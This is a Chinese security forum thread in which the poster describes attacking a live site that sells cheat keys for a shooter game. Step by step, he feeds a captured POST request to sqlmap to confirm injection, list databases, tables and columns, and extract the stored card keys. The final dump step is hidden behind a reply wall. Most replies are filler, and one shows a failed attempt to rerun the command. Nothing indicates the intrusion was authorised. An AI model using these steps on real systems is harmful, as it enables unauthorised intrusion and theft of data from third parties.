用户
搜索
  • TA的每日心情
    开心
    2018-1-30 12:14
  • 签到天数: 7 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    15

    主题

    179

    帖子

    546

    魔法币
    收听
    0
    粉丝
    25
    注册时间
    2017-4-15

    i春秋认证春秋文阁i春秋签约作者

    发表于 2018-2-2 12:55:41 25714728
    本帖最后由 jasonx 于 2018-2-2 14:19 编辑

    前言:某表哥发了一个某吃鸡外挂的发卡平台注入点,我个人对外挂没啥好感,毕竟太破坏游戏体验了,然后就顺手跑一下。

    0x01 sqlmap走起

    这是一个post注入,我们把通过burp抓到的请求复制到一个txt文件里面,然后放到c盘根目录下。

    [AppleScript] 纯文本查看 复制代码
    POST /index.php/Home/Index/ajaxname HTTP/1.1[/size]
    [size=3]Content-Length: 71[/size]
    [size=3]Content-Type: application/x-www-form-urlencoded[/size]
    [size=3]X-Requested-With: XMLHttpRequest[/size]
    [size=3]Referer: [url]http://10.10.10.10/[/url][/size]
    [size=3]Cookie: PHPSESSID=fhj6t4m3o79ov1n4dk36bn9413[/size]
    [size=3]Host: 10.10.10.10[/size]
    [size=3]Connection: Keep-alive[/size]
    [size=3]Accept-Encoding: gzip,deflate[/size]
    [size=3]User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21[/size]
    [size=3]Accept: */*[/size]
    
    [size=3]name=-1


    然后我们打开sqlmap 输入如下命令。
    [AppleScript] 纯文本查看 复制代码
    sqlmap.py -r c:\1.txt --data "name=-1" 


    2.jpg

    当如下提示的时候,我们输入Y然后回车继续。
    [AppleScript] 纯文本查看 复制代码
    are you really sure that you want to continue (sqlmap could have problems)? [y/N]


    稍等片刻后发现这里的确存在注入。

    9.jpg

    我们输入如下命令列出他的数据库名称
    [AppleScript] 纯文本查看 复制代码
    sqlmap.py -r c:\1.txt --data "name=-1" --dbs


    可以看到数据库已经出来了,他这个网站的数据库是第一个。

    3.jpg

    输入如下命令读出表名字
    [AppleScript] 纯文本查看 复制代码
    sqlmap.py -r c:\1.txt --data "name=-1" -D _ka_打码 --tables


    从下图可以看到,他的外挂卡密是存放在这个表里面。

    5.jpg

    输入以下命令读出这个表里面的所有字段
    [AppleScript] 纯文本查看 复制代码
    sqlmap.py -r c:\1.txt --data "name=-1" -D _ka_打码 -T zd_kami --columns


    6.jpg

    可以看到,所有字段都出来了。

    7.jpg

    0x02 直接导出所有卡密
    输入如下命令导出这些字段
    游客,如果您要查看本帖隐藏内容请回复








    看看                              
    使用道具 举报 回复
    发表于 2018-2-3 13:52:03
    wodetianla 发表于 2018-2-3 10:15
    为什么,论坛,都需要,评论,才,能,看

    因为不回复的话,帖子就沉下去了,特别是一些经典的帖子,沉下去以后就看不到了。
    使用道具 举报 回复
    C:\Users\Administrator\AppData\Local\Programs\python2.7\sqlmap>sqlmap.py -r c:\1.txt --data "name=-1"
    拒绝访问。
    使用道具 举报 回复
    厉害了                           
    使用道具 举报 回复
    onls辜釉 i春秋作家 春秋认证√作家团颜值担当 i春秋签约作者 春秋文阁 秦
    推荐
    发表于 2018-2-5 15:26:04
    jasonx 发表于 2018-2-3 05:52
    因为不回复的话,帖子就沉下去了,特别是一些经典的帖子,沉下去以后就看不到了。 ...

    表哥你骗人
    信息安全菜鸟/社会主义接班人
    使用道具 举报 回复
    keyi                       
    使用道具 举报 回复
    沙发!!
    使用道具 举报 回复
    发表于 2018-2-2 14:06:19
    I just  want to see see
    使用道具 举报 回复
    发表于 2018-2-2 14:13:31
    楼主辛苦了 真是好人啊
    部分回复是自动回帖回的。
    使用道具 举报 回复
    发表于 2018-2-2 14:21:29
    膜拜。这就是大佬啊
    使用道具 举报 回复
    发表于 2018-2-2 14:29:15
    前排........
    使用道具 举报 回复
    发表于 2018-2-2 14:45:43
    使用道具 举报 回复

    楼主辛苦了 真是好人啊
    使用道具 举报 回复
    发表于 2018-2-2 14:52:21
    板凳!!!!
    使用道具 举报 回复

    I just  want to see see
    使用道具 举报 回复
    发表于 2018-2-2 15:00:57
    看看卡密嘿嘿
    使用道具 举报 回复
    Hacker1ee 安全团队 Zer0 Sec(零安全团队核心 i春秋认证 i春秋签约作者
    17#
    发表于 2018-2-2 15:06:36
    可以,这很黑客,支持TT
    Zero Security  Team
    使用道具 举报 回复

    I just  want to see see too!
    使用道具 举报 回复
    羡慕大佬,,,,,
    使用道具 举报 回复


    I just  want to see see too!
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册